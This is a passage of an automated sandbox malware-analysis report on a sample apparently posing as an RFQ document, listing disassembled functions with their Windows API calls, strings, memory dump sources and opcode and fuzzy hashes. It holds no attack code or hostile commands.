                                              • Opcode ID: 0351cdd5c954c3ce2bafc0231fe7230fe15b94a2aa7f2168ee6000659ad57b7c
                                              • Instruction ID: 703c347b0ee6fb825894f872bb11c407f3835c1ed28e8eecff423f0db20369fc
                                              • Opcode Fuzzy Hash: 0351cdd5c954c3ce2bafc0231fe7230fe15b94a2aa7f2168ee6000659ad57b7c
                                              • Instruction Fuzzy Hash: 5271B030400245DFCF298F64DC84AEA7BBAFF49350F14427AFD556A2A6C73188D2DBA1
                                              Function 00155A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSAStartup.WSOCK32(00000101,?), ref: 00155AA6
                                              • inet_addr.WSOCK32(?,?,?), ref: 00155AEB
                                              • gethostbyname.WSOCK32(?), ref: 00155AF7
                                              • IcmpCreateFile.IPHLPAPI ref: 00155B05
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00155B75
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00155B8B
                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00155C00
                                              • WSACleanup.WSOCK32 ref: 00155C06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: e216ba9dbcdbf68bc2640e5440a6efcd7b1728876c97de94226f20b456f9c21b
                                              • Instruction ID: 08f8e2feeb273dd795127bcb7e21829d0004e858b2e60c08aceaac2094ec42e4
                                              • Opcode Fuzzy Hash: e216ba9dbcdbf68bc2640e5440a6efcd7b1728876c97de94226f20b456f9c21b
                                              • Instruction Fuzzy Hash: 6951B131604701DFDB10EF25DC59B6ABBE6EF48311F14892AF965EB2A1DB70E844CB42
                                              Function 0016C27C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                                • Part of subcall function 000E2344: GetCursorPos.USER32(?), ref: 000E2357
                                                • Part of subcall function 000E2344: ScreenToClient.USER32(001A67B0,?), ref: 000E2374
                                                • Part of subcall function 000E2344: GetAsyncKeyState.USER32(00000001), ref: 000E2399
                                                • Part of subcall function 000E2344: GetAsyncKeyState.USER32(00000002), ref: 000E23A7
                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0016C2E4
                                              • ImageList_EndDrag.COMCTL32 ref: 0016C2EA
                                              • ReleaseCapture.USER32 ref: 0016C2F0
                                              • SetWindowTextW.USER32(?,00000000), ref: 0016C39A
                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0016C3AD
                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0016C48F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
                                              • API String ID: 1924731296-2104563098
                                              • Opcode ID: a96d179c309407dec824b3df0a81ef31777bc25e5ba6f176906bb8a45792d93e
                                              • Instruction ID: 5c575819e4486b4a73f3da62f50ec8fdcb63ac74ac7ecd8e9a79faebe0e239e8
                                              • Opcode Fuzzy Hash: a96d179c309407dec824b3df0a81ef31777bc25e5ba6f176906bb8a45792d93e
                                              • Instruction Fuzzy Hash: A5518C74204304AFD700EF24DC95FAA7BE5FB88310F04892DF5A59B2E2DB70A995CB52
                                              Function 0014B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0014B73B
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0014B7B1
                                              • GetLastError.KERNEL32 ref: 0014B7BB
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0014B828
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: 3960a6c5f7a3c5c79c485c9e0e6cc2e2451c5ae1f3e4e5dfddd6fb51ecd56c72
                                              • Instruction ID: b6777e6003faba9755ea5b35ac802cc1cf3303789c9e49fa961915884d4fdfc5
                                              • Opcode Fuzzy Hash: 3960a6c5f7a3c5c79c485c9e0e6cc2e2451c5ae1f3e4e5dfddd6fb51ecd56c72
                                              • Instruction Fuzzy Hash: D6318F35A042099FDB00EF64DCC5AEE7BB8FF84751F148029E806A72E2DB71D946CB91
                                              Function 00166442 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 0016645A
                                              • GetDC.USER32(00000000), ref: 00166462
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0016646D
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00166479
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001664B5
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001664C6
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00169299,?,?,000000FF,00000000,?,000000FF,?), ref: 00166500
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00166520
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID: @U=u
                                              • API String ID: 3864802216-2594219639
                                              • Opcode ID: 7628a246f13645ec9a7ed421e767fc5dc0b8e8c5457338fd0719fe1ce0511ad4
                                              • Instruction ID: acb0de18a0542763a4439b51281c249ee59b1d1a5ad309a815a08bce8c23111f
                                              • Opcode Fuzzy Hash: 7628a246f13645ec9a7ed421e767fc5dc0b8e8c5457338fd0719fe1ce0511ad4
                                              • Instruction Fuzzy Hash: B0316F76101214BFEB118F50DC4AFEA3FA9EF09761F044069FE099A1A1D7B59C92CB74
                                              Function 00158BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00158BEC
                                              • CoInitialize.OLE32(00000000), ref: 00158C19
                                              • CoUninitialize.OLE32 ref: 00158C23
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00158D23
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00158E50
                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00172C0C), ref: 00158E84
                                              • CoGetObject.OLE32(?,00000000,00172C0C,?), ref: 00158EA7
                                              • SetErrorMode.KERNEL32(00000000), ref: 00158EBA
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00158F3A
                                              • VariantClear.OLEAUT32(?), ref: 00158F4A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                              • String ID:
                                              • API String ID: 2395222682-0
                                              • Opcode ID: af4f65398b33a181d1f17af55efedccec5a10b6f1245b7bc58f488c67cbf13d1
                                              • Instruction ID: bbd23c87e97076d2adcf8614af5e18466eb51c019d90c692e103419bc12886a2
                                              • Opcode Fuzzy Hash: af4f65398b33a181d1f17af55efedccec5a10b6f1245b7bc58f488c67cbf13d1
                                              • Instruction Fuzzy Hash: 8AC12571208305EFC700DF64C88496AB7E9FF89349F00495DF99AAB251DB71ED0ACB52
                                              Function 00144189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __swprintf.LIBCMT ref: 0014419D
                                              • __swprintf.LIBCMT ref: 001441AA
                                                • Part of subcall function 001038D8: __woutput_l.LIBCMT ref: 00103931
                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 001441D4
                                              • LoadResource.KERNEL32(?,00000000), ref: 001441E0
                                              • LockResource.KERNEL32(00000000), ref: 001441ED
                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0014420D
                                              • LoadResource.KERNEL32(?,00000000), ref: 0014421F
                                              • SizeofResource.KERNEL32(?,00000000), ref: 0014422E
                                              • LockResource.KERNEL32(?), ref: 0014423A
                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0014429B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                              • String ID:
                                              • API String ID: 1433390588-0
                                              • Opcode ID: 993120bc3d940447d5a220b471124684ef672c1e57f29ba173480b1781d52f01
                                              • Instruction ID: 77f966672e748ac0a5f6f539da381fbbcb6da19edea9a966857a51fdeff277d5
                                              • Opcode Fuzzy Hash: 993120bc3d940447d5a220b471124684ef672c1e57f29ba173480b1781d52f01
                                              • Instruction Fuzzy Hash: 0A318172A0521AAFDB119F60EC58EBF7BADFF09301F004529F915D2560D7B0DA92CBA4
                                              Function 001416DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00141700
                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00140778,?,00000001), ref: 00141714
                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0014171B
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00140778,?,00000001), ref: 0014172A
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0014173C
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00140778,?,00000001), ref: 00141755
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00140778,?,00000001), ref: 00141767
                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00140778,?,00000001), ref: 001417AC
                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00140778,?,00000001), ref: 001417C1
                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00140778,?,00000001), ref: 001417CC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                              • String ID:
                                              • API String ID: 2156557900-0
                                              • Opcode ID: 0444a1ca31706938ecc634d93eb3ecabb9ec9b981642edba6bdb56f51e6e5f9a
                                              • Instruction ID: 15d5a1e354255716d7ba779cdc7a58aed0c433bab4d151c1118a01211c7c3410
                                              • Opcode Fuzzy Hash: 0444a1ca31706938ecc634d93eb3ecabb9ec9b981642edba6bdb56f51e6e5f9a
                                              • Instruction Fuzzy Hash: D8319175604204BFEB129F14ED84F797BE9EB56722F104029F914C6AF0E7B49EC18B61
                                              Function 0013A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnumChildWindows.USER32(?,0013AA64), ref: 0013A9A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ChildEnumWindows
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                              • API String ID: 3555792229-1603158881
                                              • Opcode ID: 33bcd6bfdcf547577e8886a951d30e7791586829298dc1e7341e009d6c4b5b33
                                              • Instruction ID: 45f571a9b8142cd0a6e2e44b664ed3055ce99a3631ba616123f305aca0c97b81
                                              • Opcode Fuzzy Hash: 33bcd6bfdcf547577e8886a951d30e7791586829298dc1e7341e009d6c4b5b33
                                              • Instruction Fuzzy Hash: 5F91A530A0020AEBDF18DFA0C481BE9FB74BF14314F918119D9DAB7191DF706A59CBA1
                                              Function 0016B60B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindow.USER32(00F154E0), ref: 0016B6A5
                                              • IsWindowEnabled.USER32(00F154E0), ref: 0016B6B1
                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0016B795
                                              • SendMessageW.USER32(00F154E0,000000B0,?,?), ref: 0016B7CC
                                              • IsDlgButtonChecked.USER32(?,?), ref: 0016B809
                                              • GetWindowLongW.USER32(00F154E0,000000EC), ref: 0016B82B
                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0016B843
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                              • String ID: @U=u
                                              • API String ID: 4072528602-2594219639
                                              • Opcode ID: dcd42f8eef26e53701959d81bfee4eff448229a5890f27e15d6e98dfb8230119
                                              • Instruction ID: 40cc717ef45af259718cb403037dbfab6cc76d524aa59036b84cd04b71cd8ad8
                                              • Opcode Fuzzy Hash: dcd42f8eef26e53701959d81bfee4eff448229a5890f27e15d6e98dfb8230119
                                              • Instruction Fuzzy Hash: 14718D74608204AFDB249F64CCD4FBABBB9FF89300F154069E956D72A1C731A9E1CB50
                                              Function 00166FEF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00167093
                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 001670A7
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001670C1
                                              • _wcscat.LIBCMT ref: 0016711C
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00167133
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00167161
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window_wcscat
                                              • String ID: @U=u$SysListView32
                                              • API String ID: 307300125-1908207174
                                              • Opcode ID: 0908c6c39ac619bb962a3b845a218448b83467fe45eb513388e854261502fa58
                                              • Instruction ID: 6b30e84ccdf5cf714e3d52af8e6f11ccef842617d206712bb97c4442a2d0b409
                                              • Opcode Fuzzy Hash: 0908c6c39ac619bb962a3b845a218448b83467fe45eb513388e854261502fa58
                                              • Instruction Fuzzy Hash: C741D270A04308AFEB21DFA4DC85BEE77A8EF09354F10042AF594E71D2D7719D948B60
                                              Function 0016653C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0016655B
                                              • GetWindowLongW.USER32(00F154E0,000000F0), ref: 0016658E
                                              • GetWindowLongW.USER32(00F154E0,000000F0), ref: 001665C3
                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001665F5
                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0016661F
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00166630
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0016664A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID: @U=u
                                              • API String ID: 2178440468-2594219639
                                              • Opcode ID: e1f2be3b47e9a32b4f156590c4c40a00ee364e621167a3d36f114b1a6fa8790d
                                              • Instruction ID: 9616059d636fdf3bd301c2aba46c69c6bdd2fe17bf5b6ff9b664310a1e53fcae
                                              • Opcode Fuzzy Hash: e1f2be3b47e9a32b4f156590c4c40a00ee364e621167a3d36f114b1a6fa8790d
                                              • Instruction Fuzzy Hash: 40312431604250AFDB20CF28EC86F553BE5FB4A750F1901A8F9128B6B5CB71ACA1DB91
                                              Function 00158F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0016F910), ref: 0015903D
                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0016F910), ref: 00159071
                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001591EB
                                              • SysFreeString.OLEAUT32(?), ref: 00159215
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                              • String ID:
                                              • API String ID: 560350794-0
                                              • Opcode ID: 7099b0b56c452bcec7d5b3411595a68b47e00a0f691d87155797fa741438fb57
                                              • Instruction ID: bbd7e7dd6d1c964350496c28cedce179363536c727741c6e38e17094ecd2647a
                                              • Opcode Fuzzy Hash: 7099b0b56c452bcec7d5b3411595a68b47e00a0f691d87155797fa741438fb57
                                              • Instruction Fuzzy Hash: 34F12A71A00119EFDB04DFA4C888EAEB7B9FF49315F108059F926AF291CB71AD49CB51
                                              Function 0015F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 0015F9C9
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0015FB5C
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0015FB80
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0015FBC0
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0015FBE2
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0015FD5E
                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0015FD90
                                              • CloseHandle.KERNEL32(?), ref: 0015FDBF
                                              • CloseHandle.KERNEL32(?), ref: 0015FE36
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                              • String ID:
                                              • API String ID: 4090791747-0
                                              • Opcode ID: c11734fc382d0ac36da68611b99c51f8fa8475da2d37e2acb33b3b3a460adc27
                                              • Instruction ID: a9f4b03b8ff8b755478685d3a706b36a012dd93886c41ef2497065da6af0aa78
                                              • Opcode Fuzzy Hash: c11734fc382d0ac36da68611b99c51f8fa8475da2d37e2acb33b3b3a460adc27
                                              • Instruction Fuzzy Hash: 10E1A031204341DFCB14EF24C895A6ABBE1BF84354F14896DF8A99F2A2DB71DC46CB52
                                              Function 00144F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 001448AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001438D3,?), ref: 001448C7
                                                • Part of subcall function 001448AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001438D3,?), ref: 001448E0
                                                • Part of subcall function 00144CD3: GetFileAttributesW.KERNEL32(?,00143947), ref: 00144CD4
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00144FE2
                                              • _wcscmp.LIBCMT ref: 00144FFC
                                              • MoveFileW.KERNEL32(?,?), ref: 00145017
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
